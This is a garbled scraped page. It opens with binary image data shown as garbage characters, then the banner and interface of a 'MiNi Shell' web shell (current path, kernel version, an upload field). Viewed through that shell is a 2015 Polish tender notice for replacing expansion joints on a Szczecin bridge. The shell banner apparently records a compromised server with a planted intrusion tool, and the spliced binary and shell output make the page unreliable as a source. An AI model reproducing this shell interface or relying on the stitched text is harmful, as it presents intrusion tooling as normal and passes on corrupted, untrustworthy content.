JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150709/171884-N-2015.html

<p class="kh_header"><b>Szczecin: Wymiana dylatacji na moście im. Pionierów Miasta Szczecin w ciągu drogi krajowej nr 10 w mieście Szczecin</b><br>
<b>Numer ogłoszenia: 171884 - 2015; data zamieszczenia: 09.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 91 4800444,4800434, faks 91 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana dylatacji na moście im. Pionierów Miasta Szczecin w ciągu drogi krajowej nr 10 w mieście Szczecin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja zadania pn. Wymiana dylatacji na moście im. Pionierów Miasta Szczecin w ciągu drogi krajowej nr 10 w mieście Szczecin. Zamówienie obejmuje wykonanie robót budowlanych na podstawie dokumentacji projektowej opracowanej przez Biuro Projektowe P.O.Most, Radosław Partyka, ul. Duńska 27D/6, 71-795 Szczecin, stanowiącą załącznik nr 10 do siwz.
2.	Kod CPV 45 00 0000-7 - roboty budowlane 
3.	Zakres zamówienia: 
1)	Wykonanie robót budowlanych polegających na wymianie dylatacji na przyczółku wschodnim (dylatacja nad podporą G) na podstawie dokumentacji projektowej opracowanej przez Biuro Projektowe P.O.Most, stanowiącą załącznik nr 10 do siwz., w tym: 
a)	Wprowadzenie tymczasowej organizacji ruchu na czas budowy;
b)	Roboty przygotowawcze;
c)	Wymiana przykrycia dylatacyjnego
2)	Wykonanie dokumentacji powykonawczej;
3)	W ramach rękojmi: 
a)	Usuwanie wad i usterek. 
Uwaga: Ujęta w projekcie wymiana dylatacji nad podporą A nie jest przedmiotem niniejszego zamówienia.
4.	Projekty i opracowania objęte przedmiotem zamówienia.
W ramach umowy Wykonawca zobowiązany jest wykonać ponadto: 
1)	 Plan bezpieczeństwa i ochrony zdrowia w uzgodnieniu z Zamawiającym
2)	 Opracowania i projekty wyszczególnione w dokumentacji projektowej i specyfikacjach technicznych w uzgodnieniu z Zamawiającym.
3)	 Programy Zapewnienia Jakości (PZJ) dla wszystkich rodzajów robót, opisujące m.in. przyjętą przez Wykonawcę technologię wykonania robót. PZJ powinien zapewnić Zamawiającemu możliwość kontroli realizacji przedmiotu zamówienia m.in. poprzez bezzwłoczne przekazywanie Zamawiającemu wszystkich bieżących dokumentów związanych z funkcjonowaniem PZJ oraz gwarantować prawo do akceptacji decyzji naprawy wad i skutków błędów popełnionych przez Wykonawcę. PZJ powinien być zatwierdzony przez Zamawiającego. Programy te Wykonawca przekaże dla Zamawiającego w terminie 14 dni od podpisania umowy, 
4)	Dokumentację powykonawczą w wersji papierowej sporządzoną w 3 egzemplarzach, zawierającą w szczególności: 
a)	Dokumentację budowy z naniesionymi zmianami dokonywanymi w toku wykonywania robot oraz geodezyjnymi pomiarami powykonawczymi, zgodnie z art. 57 ust 1 i 2 ustawy Prawo budowlane. 
b)	Protokoły z prób, sprawdzeń, pomiarów i badań. 
c)	Protokoły  odbioru,  geodezyjną  inwentaryzację  powykonawczą.
d)	Stosowne atesty, aprobaty techniczne, deklaracje zgodności, receptury, świadectwa, jakości i inne  dokumenty  potwierdzające  dopuszczenie  zastosowania  materiałów  do  obrotu  i powszechnego stosowania w budownictwie.
5)	Dokumentację powykonawczą jak w pkt 5) sporządzoną w wersji elektronicznej na płytach CD -  2  egz. Wersja elektroniczna dokumentacji winna być przygotowana w wersji PDF 
5.	Warunki wykonawstwa: 
1)	Wykonawca jest zobowiązany we własnym zakresie i na własny koszt: 
a)	do bezpośredniego zapoznania się z terenem planowanej inwestycji, 
b)	do wykonania przedmiotu zamówienia zgodnie z przekazaną przez Zamawiającego dokumentacją projektową stanowiącą załącznik do siwz;
c)	do  dostarczenia,  zainstalowania  i  obsługiwania  wszystkich  tymczasowych  urządzeń zabezpieczających takich jak; zapory, światła ostrzegawcze, sygnały itp., zapewniając w ten sposób  bezpieczeństwo  pieszych  i  pojazdów,  oraz  do  zabezpieczenia  i  zapewnienia  stałych warunków  widoczności  tych  zapór  i znaków  w dzień  i  w  nocy,  co  jest  nieodzowne  ze względów bezpieczeństwa, 
d)	do  wykonania  pomiarów  geodezyjnych  -  wyniesienia  projektu  w  terenie,  inwentaryzacji zanikających prac, pomiary powykonawcze łącznie z kompletną mapą powykonawczą, 
e)	do wykonania dokumentacji powykonawczych, 
f)	do poniesienia innych kosztów niezbędnych do zrealizowania przedmiotu zamówienia. 
2)	  Wszystkie prace będące przedmiotem zamówienia należy wykonać zgodnie z dokumentacją projektową, postanowieniami umowy, wiedzą techniczną, zasadami sztuki budowlanej i wymogami poczynionych uzgodnień. Wykonawca jest odpowiedzialny za pełną kontrolę robót i jakości materiałów
3)	  Wykonawca  musi  zapewnić  kierownictwo  budowy,  siłę  roboczą,  materiały,  sprzęt  i  inne urządzenia oraz wszelkie przedmioty niezbędne do wykonania robót oraz usunięcia wad. Kierownik budowy ma obowiązek stałego nadzoru wykonywanych prac.
4)	  Wykonawca jest odpowiedzialny za pełną kontrolę robót i jakości materiałów. 
5)	  Kierowanie  i  nadzór  nad  robotami  sprawowany  będzie  przez  pracowników  Wykonawcy posiadających  odpowiednie  uprawnienia  budowlane oraz niezbędne wykształcenie i kwalifikacje.  Zmiana  osób  pełniących  samodzielne funkcje  techniczne na budowie w stosunku do wykazu zawartego w ofercie, a także w trakcie trwania  budowy,  wymaga  każdorazowo  akceptacji  i  zatwierdzenia  Zamawiającego.  Zmiana nastąpić  może  jedynie  na  osoby  posiadające  kwalifikacje  i  doświadczenie  odpowiadające kwalifikacjom i doświadczeniu określonemu w siwz. 
6)	  Wykonawca zobowiązany jest dołączyć protokoły z pomiarów, badań i sprawdzeń do protokołu odbioru końcowego, jako warunek tego odbioru. 
7)	  Dopuszcza się do stosowania jedynie materiały dopuszczone do obrotu i powszechnego stosowania w budownictwie. Materiały winny być opatrzone znakiem budowlanym B - jeżeli są zgodne z polską normą (PN) lub krajową aprobatą techniczną oraz zostały poddane ocenie zgodności lub znakiem CE jeżeli są zgodne z europejską normą zharmonizowaną lub w przypadku ich braku z europejską aprobatą techniczną oraz zostały poddane ocenie zgodności. 
8)	  Wykonawca przed wbudowaniem danego materiału powinien uzyskać pisemną akceptacje zamawiającego. W tym celu Wykonawca złoży stosowny wniosek wraz z dokumentami potwierdzającymi dopuszczanie danego materiału do obrotu i powszechnego stosowania w budownictwie.
9)	  Organizacja robót : 
a)	Przed rozpoczęciem robót rozbiórkowych należy zabezpieczyć przed przypadkowym uszkodzeniem istniejące urządzenia obce oraz istniejące elementy wyposażenia obiektu, koszty zabezpieczenia istniejącego urządzeń obcych oraz istniejących elementów wyposażenia obiektu przez Wykonawcę nie podlegają odrębnej zapłacie i przyjmuje się, że są włączone w ofertę cenową. Sposób zabezpieczenia urządzeń Wykonawca uzgodni z gestorami sieci.
b)	Roboty  będące  przedmiotem  zamówienia  należy  wykonać  zgodnie  z  warunkami  umowy, SWIZ,  dokumentacją  projektową,  wiedzą  techniczną,  zasadami  sztuki  budowlanej i wymogami poczynionych uzgodnień.  
c)	Roboty budowlane należy wykonywać pod ruchem w systemie połówkowym, przy założeniu, że w porze dziennej do ruchu dopuszczone muszą być 2 pasy ruchu. Za porę dzienną przyjmuje się okres czasowy od godziny 5:00 do 22:00.
d)	Wykonawca  zapewni  przejezdność  wszystkich  dróg  przebiegających  w  sąsiedztwie przekazanego  frontu  robót,  a  jeśli  nie  będzie  to  możliwe  zabezpieczy  dojazd  do poszczególnych  posesji  przez  cały  okres  prowadzenia  robót  budowlanych  zgodnie w szczególności z projektem czasowej organizacji ruchu oraz zasadami bhp, 
e)	Przed  przystąpieniem  do  robót  Wykonawca  winien  zawiadomić  poszczególnych użytkowników infrastruktury podziemnej i nadziemnej o terminie rozpoczęcia i zakończenia robót oraz potrzebie zabezpieczenia nadzoru z ich strony na czas prowadzenia robót. 
f)	Wykonawca  zobowiązany  jest  do  podawania  bieżących  ogłoszeń  w  prasie,  radiu  i  telewizji lokalnej  o  uciążliwościach  związanych  z  prowadzonymi  robotami.   
g)	Wykonawca  zobowiązany  jest  do  zachowania  środków  ostrożności  i  zabezpieczenia  przed zanieczyszczeniami  zbiorników  i  cieków  wodnych  przed  płynami  lub  substancjami toksycznymi, natomiast powietrze przed pyłami i gazami oraz możliwością powstania pożaru, przestrzegania przepisów ochrony przeciwpożarowej, 
10)	Jeżeli  ze  względów  technologicznych  lub  organizacyjnych,  nieuwzględnionych w harmonogramie  realizacji  robót,  niezbędne  jest  wydłużenie  czasu  pracy  (ponad  czas ustawowy) w dni robocze lub wykonywanie robót w dni ustawowo wolne od pracy, powinno to być uzgodnione z Zamawiającym. 
11)	Zamawiający  może  zażądać  wykonania  dodatkowych  pomiarów sprawdzających. Wykonawca poniesie koszty takich pomiarów, jeśli wykażą one, że pomiary zasadnicze były nieprawidłowe. 
12)	Jeżeli  w  dokumentacji  przetargowej  wystąpią  nazwy  własne  należy  traktować  je  jako przykładowe,  Zamawiający  dopuszcza  zastosowanie  materiałów  równoważnych  pod warunkiem,  że  zaproponowane  wyroby  będą  spełniały  te  same  normy,  parametry,  standardy oraz zostaną zaakceptowane przez Zamawiającego. Rozwiązania  równoważne  zgodnie  ze  swoją definicją muszą posiadać parametry  nie gorsze,  niż wskazane  przykładowo  w  dokumentacji  projektowej  i Specyfikacjach technicznych wykonania i odbioru robot budowlanych.




6.	Klauzule dodatkowe: 
1)	  Wykonawca  najpóźniej  w  ciągu  7  dni  od  dnia  podpisania  umowy,  przekaże  Harmonogram Realizacji Zadania (rzeczowy), określający kolejność i zakres wykonywania robót  oraz  terminy  rozpoczęcia  i  zakończenia  poszczególnych  elementów  robót,  który  będzie podlegał Akceptacji Zamawiającego. 
2)	  Na każdorazowy wniosek Zamawiającego Wykonawca będzie  aktualizował Harmonogram Realizacji Zadania i przedkładał go do akceptacji Zamawiającego. 
3)	  Wykonawca  będzie  odpowiedzialny  za  ochronę  robót  i  za  wszelkie  materiały  i  urządzenia używane do robót od daty rozpoczęcia do daty zakończenia robót, 
4)	  Tymczasowe  zajęcie  terenów,  niezbędnych  do  prowadzenia  robót  budowlanych  Wykonawca uzgadnia we własnym zakresie i na swój koszt. 
5)	  Wszystkie  materiały  pochodzące  z  prowadzonych  w  ramach  inwestycji  robót,  wymagające wywozu  np.  materiał  z  rozbiórki  obiektów  budowlanych,  gruz,  urobek  ziemny,  materiał z karczowania i wycinki drzew i krzewów itp. będą stanowiły własność Wykonawcy. 
6)	  Wykonawca  jest  wytwórcą  odpadów  w  rozumieniu  przepisów  ustawy  o  odpadach  z dnia14 grudnia  2012 r. z późniejszymi zmianami, i winien prowadzić gospodarkę odpadami zgodnie z ww. ustawą, w tym ilościową i jakościową ewidencję odpadów. Wykonawca w trakcie realizacji zamówienia  ma  obowiązek  w  pierwszej  kolejności poddania  odpadów  budowlanych  (odpadów betonowych, ziemi, gruzu budowlanego) odzyskowi, a jeżeli z przyczyn technologicznych jest on niemożliwy  lub  nieuzasadniony  z  przyczyn  ekologicznych  lub  ekonomicznych,  to Wykonawca zobowiązany jest do przekazania odpadów do unieszkodliwienia. Wykonawca zobowiązany jest udokumentować  Zamawiającemu  sposób  gospodarowania  tymi  odpadami,  jako  warunek dokonania odbioru końcowego realizowanego zamówienia. 
7)	  W przypadku materiałów nienadających się do ponownego użycia należy uwzględnić wywóz do firm zajmujących się przeróbką i utylizacją. Koszty z tego tytułu dla Wykonawcy nie podlegają odrębnej zapłacie i przyjmuje się, że są włączone w ceny jednostkowe. 
8)	Ponadto do obowiązków Wykonawcy należy: 
a)	zagospodarowanie placu budowy, utrzymanie zaplecza budowy, ponoszenie kosztów zużycia niezbędnych  mediów  oraz  likwidacja  zaplecza  i uporządkowanie  terenu  budowy  po zakończeniu robót, oraz odtworzenia ewentualnych uszkodzonych elementów i przywrócenia ich  do  stanu  z  dnia  przejęcia  placu  budowy,  w  tym  do  ewentualnej  naprawy  nawierzchni sąsiadujących jezdni- uszkodzonych w trakcie prowadzenia prac. 
b)	zapewnienie ochrony mienia na terenie budowy i ochrony p.poż., 
c)	zapewnienie bezpieczeństwa i praw właścicielom posesji i budynków sąsiadujących z terenem budowy i w razie roszczeń z ich stron powinien je rozpatrywać i załatwiać bez zbędnej zwłoki. Brak  reakcji  ze  strony  Wykonawcy,    bądź  opieszałość  w załatwianiu  roszczeń  będzie upoważniała  zamawiającego  do  pokrycia  kwot  zaspokajających  roszczenia  z  należnych płatności Wykonawcy, 
d)	oznaczenie  terenu  budowy  i  zabezpieczenie  miejsc  prowadzenia  robót,  zgodnie z obowiązującymi przepisami, 
e)	zapewnienie pełnej obsługi geodezyjnej, 
f)	wykonanie  na  swój  koszt  odkrywki  elementów  robót  budzących  wątpliwości  w celu sprawdzenia,  jakości  ich  wykonania,  jeżeli  wykonanie  tych  robót  nie  zostało  zgłoszone  do sprawdzenia przed ich zakryciem, 
g)	ścisłej współpracy z Nadzorem Autorskim i Zamawiającym,  
7.	Odbiór końcowy: 
1)	Przedmiotem odbioru końcowego będzie przedmiot umowy. 
2)	Odbiór końcowy przedmiotu umowy nastąpi na podstawie protokołu końcowego odbioru. 
3)	Na  dzień  odbioru  końcowego  Wykonawca  dostarczy  dokumentację  powykonawczą  zawierającą m.in.: 
a)	Dokumentację projektową z naniesionymi zmianami. 
b)	Recepty i ustalenia technologiczne. 
c)	Karty Obmiaru (oryginały). 
d)	Wyniki pomiarów kontrolnych oraz badań i oznaczeń laboratoryjnych, zgodnie z STWiORB oraz PZJ (Program zapewnienia jakości). 
e)	Atesty, aprobaty i deklaracje zgodności lub certyfikaty zgodności wbudowanych materiałów.
f)	Instrukcje eksploatacji urządzeń budowlanych, 
g)	Rysunki  (dokumentacje)  na  wykonanie  robót  towarzyszących  oraz protokoły odbioru i przekazania tych robót właścicielom urządzeń. 
h)	Geodezyjną inwentaryzację powykonawczą robót i sieci uzbrojenia terenu. 
i)	Dokumentacja fotograficzna dla wszystkich prowadzonych robót, w szczególności robót zanikających przekazana w wersji elektronicznej
oraz inne dokumenty wynikające z technologii robót, dokumentacji i specyfikacji technicznej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości 8 000,00 PLN (słownie złotych: osiem tysięcy) w terminie do dnia 24. 07.2015r., do godziny 08:30. 
Decyduje data i godzina wpływu środków do zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na rachunek depozytowy ZDiTM w Szczecinie Nr 85 1020 4795 0000 9702 0278 0682.
Zaleca się aby w tytule przelewu oprócz nazwy wykonawcy, informacji do jakiego postępowania wadium zostało wniesione podać nr NIP.
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w kasie ZDiTM (parter) od poniedziałku do piątku w godzinach 07:30 - 15:30.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną.

Za jedną najważniejszą robotę budowlaną podobną zamawiający uzna wymianę urządzenia dylatacyjnego wielomodułowego w ciągu drogi krajowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie znany za spełniony, jeśli wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej jedną osobą na wymienione poniżej stanowisko:

-  kierownik robót 
Wymagane kwalifikacje:  uprawnienia budowlane w specjalności mostowej bez ograniczeń do kierowania robotami budowlanymi, (lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie poprzednio obowiązujących przepisów)

            UWAGA dotycząca stanowiska wskazanego powyżej
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 - tekst jednolity ze zmianami) osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą ich nadania.
Ponadto, zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

